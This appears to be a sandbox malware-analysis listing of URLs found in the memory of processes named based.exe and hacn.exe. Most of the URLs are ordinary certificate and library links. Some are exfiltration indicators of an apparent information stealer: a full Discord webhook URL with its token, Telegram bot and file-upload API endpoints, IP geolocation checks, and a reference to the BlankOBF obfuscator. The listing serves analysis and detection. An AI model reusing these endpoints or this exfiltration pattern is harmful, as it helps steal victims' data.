Source: based.exe, 00000004.00000003.1871128429.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382843962.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380585995.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D0905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://json.org
Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1672326950.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670882598.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: based.exe, 00000004.00000003.2380504617.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2378136053.00000201D0929000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1763481710.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359523519.00000201D0929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftCHROME~2.TXTy./
Source: based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftISPLA~1.PNGy.
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: based.exe, 00000004.00000002.2387954402.00000201D1C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadrU
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr;
Source: based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr;r
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot%s/%s
Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: based.exe, 00000004.00000003.1697774111.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698372056.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697774111.00000201D075D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1699291343.00000201D07D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697523584.00000201D0948000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698004451.00000201D07C8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1701839731.00000201D07D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: hacn.exe, 00000003.00000002.1704402045.000002075C83C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381279282.00000201CFC48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: hacn.exe, 00000003.00000003.1699100355.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1700843802.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690999931.000002075AFE3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1696726978.000002075AFD9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701432370.000002075AFFC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698584471.000002075AFEC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697785294.000002075AFE9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704358371.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701967125.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
